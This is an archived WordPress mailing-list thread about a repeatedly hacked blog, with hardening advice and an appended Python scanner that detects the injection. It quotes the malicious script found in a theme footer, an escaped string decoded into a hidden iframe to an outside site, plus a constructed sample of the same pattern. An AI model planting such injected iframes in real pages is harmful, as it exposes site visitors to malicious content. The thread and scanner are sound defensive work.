[wp-hackers] wordpress theme script injection (hosted on dreamhost)
banago at gmail.com
Sun Oct 31 18:18:13 UTC 2010
> *On shared hosting WP is often the target, but rarely the entrance.*
This seems so true.
www.wplancer.com | www.banago.info | www.lintuts.com
On 31 October 2010 22:45, Ozh <ozh at ozh.org> wrote:
> Typically not a Dreamhost issue, otherwise there would be *thousands*
> of people screaming, and me in the first line.
> Being up to date with WP is fine, but most hacks on shared hosting are
> not done using WP.
> - check file permissions <http://codex.wordpress.org/Hardening_WordPress>
> - check other software & scripts running on your blog
> - change your main/SSH/FTP password
> - change your WP password
> I once had a WP blog hacked on Dreamhost. A few hours of investigation
> later (checking all the above + inspecting access logs) I found out
> that the insecure stuff was Scuttle (a delicious clone).
> On shared hosting WP is often the target, but rarely the entrance.
> On Sun, Oct 31, 2010 at 4:07 PM, Mladen Adamovic
> <mladen.adamovic at gmail.com> wrote:
> > Hi guys,
> > My wordpress software instance was repeatedly hacked ... running latest
> > Wordpress source code and being hosted on Dreamhost.
> > I don't know which exploit it did use and couldn't identify it, but it
> > is adding the following code to my default theme footer.php:
> > <script>
> > enc =
> > withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> > I think I'll have to migrate to Blogger, since I couldn't identify
> > it did use.
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
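A defender-side check for the injection pattern quoted in the thread, as an added example that is not part of any of the original messages: it scans theme files for inline scripts that pass a percent-encoded string through `unescape()` into `document.write()` and decodes the string to show the hidden markup. The function names, the sample `footer.php` content and the `example.invalid` host are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
STRING_RE = re.compile(r"""(["'])(.*?)\1""", re.S)   # JS string literals
HIDDEN_TAG_RE = re.compile(r"<\s*(iframe|script)\b", re.I)


def scan_text(text):
    """Report inline scripts that unescape() an encoded string and
    document.write() it, when the decoded string holds an iframe/script tag."""
    findings = []
    for block in SCRIPT_RE.finditer(text):
        body = block.group(1)
        if "unescape" not in body or "document.write" not in body:
            continue
        for lit in STRING_RE.finditer(body):
            # unquote() covers %XX escapes; JS unescape() also accepts
            # %uXXXX, which this example does not decode.
            decoded = unquote(lit.group(2))
            tag = HIDDEN_TAG_RE.search(decoded)
            if tag:
                line = text.count("\n", 0, block.start()) + 1
                findings.append({"line": line, "tag": tag.group(1).lower(),
                                 "decoded": decoded})
    return findings


def scan_theme(theme_dir):
    """Scan every .php file under a theme directory; map path -> findings."""
    results = {}
    for path in sorted(Path(theme_dir).rglob("*.php")):
        found = scan_text(path.read_text(errors="replace"))
        if found:
            results[str(path)] = found
    return results


# Constructed sample of an infected footer.php (host is a placeholder).
SAMPLE_FOOTER = """<?php wp_footer(); ?>
<script>
enc = "%3Ciframe%20src%3D%27http%3A//example.invalid/x.php%27%3E%3C/iframe%3E";
dec = unescape(enc);
document.write(dec);
</script>
</body>
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_FOOTER):
        print(f"line {f['line']}: hidden <{f['tag']}> -> {f['decoded']}")
```

Run `scan_theme()` against `wp-content/themes` after restoring clean files as well; a finding that reappears means the entry point (per the thread, often another script on the same account) is still open.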